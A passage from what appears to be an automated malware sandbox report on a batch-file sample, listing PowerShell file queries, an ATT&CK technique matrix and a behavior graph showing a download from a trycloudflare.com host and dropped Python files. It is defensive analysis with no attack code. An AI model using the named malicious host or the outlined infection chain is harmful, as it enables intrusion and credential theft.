                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.dll VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression.FileSystem\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.FileSystem.dll VolumeInformation
                Source: find.exe, 0000000C.00000002.1242592416.00000188EF570000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: avgui.exe
                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity Information1
                Scripting
                Valid Accounts1
                Windows Management Instrumentation
                1
                Scripting
                11
                Process Injection
                1
                Masquerading
                OS Credential Dumping11
                Security Software Discovery
                Remote ServicesData from Local System1
                Encrypted Channel
                Exfiltration Over Other Network MediumAbuse Accessibility Features
                CredentialsDomainsDefault Accounts1
                Command and Scripting Interpreter
                1
                DLL Side-Loading
                1
                DLL Side-Loading
                21
                Virtualization/Sandbox Evasion
                LSASS Memory2
                Process Discovery
                Remote Desktop ProtocolData from Removable Media1
                Ingress Tool Transfer
                Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain Accounts1
                PowerShell
                Logon Script (Windows)Logon Script (Windows)11
                Process Injection
                Security Account Manager21
                Virtualization/Sandbox Evasion
                SMB/Windows Admin SharesData from Network Shared Drive2
                Non-Application Layer Protocol
                Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
                Obfuscated Files or Information
                NTDS1
                Application Window Discovery
                Distributed Component Object ModelInput Capture23
                Application Layer Protocol
                Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                DLL Side-Loading
                LSA Secrets1
                File and Directory Discovery
                SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC ScriptsSteganographyCached Domain Credentials12
                System Information Discovery
                VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet
                behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1663711 Sample: yap.bat Startdate: 12/04/2025 Architecture: WINDOWS Score: 76 49 german-tan-exotic-collectibles.trycloudflare.com 2->49 51 x1.i.lencr.org 2->51 53 4 other IPs or domains 2->53 59 Malicious sample detected (through community Yara rule) 2->59 61 Multi AV Scanner detection for submitted file 2->61 63 Joe Sandbox ML detected suspicious sample 2->63 65 2 other signatures 2->65 11 cmd.exe 1 2->11         started        signatures3 process4 signatures5 69 Suspicious powershell command line found 11->69 14 powershell.exe 12 11->14         started        16 conhost.exe 11->16         started        process6 process7 18 cmd.exe 3 2 14->18         started        signatures8 57 Suspicious powershell command line found 18->57 21 powershell.exe 1002 18->21         started        25 powershell.exe 14 17 18->25         started        28 Acrobat.exe 74 18->28         started        30 6 other processes 18->30 process9 dnsIp10 37 C:\Users\user\Downloads\...\__main__.py, Python 21->37 dropped 39 C:\Users\user\Downloads\...\structs.py, Python 21->39 dropped 41 C:\Users\user\Downloads\...\resolvers.py, Python 21->41 dropped 45 385 other files (3 malicious) 21->45 dropped 67 Loading BitLocker PowerShell Module 21->67 55 german-tan-exotic-collectibles.trycloudflare.com 104.16.231.132, 443, 49687 CLOUDFLARENETUS United States 25->55 43 C:\Users\user\Downloads\downloaded.zip, Zip 25->43 dropped 32 AcroCEF.exe 89 28->32         started        file11 signatures12 process13 dnsIp14 47 e8652.dscx.akamaiedge.net 23.207.49.54, 49693, 80 AKAMAI-ASUS United States 32->47 35 AcroCEF.exe 2 32->35         started        process15

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.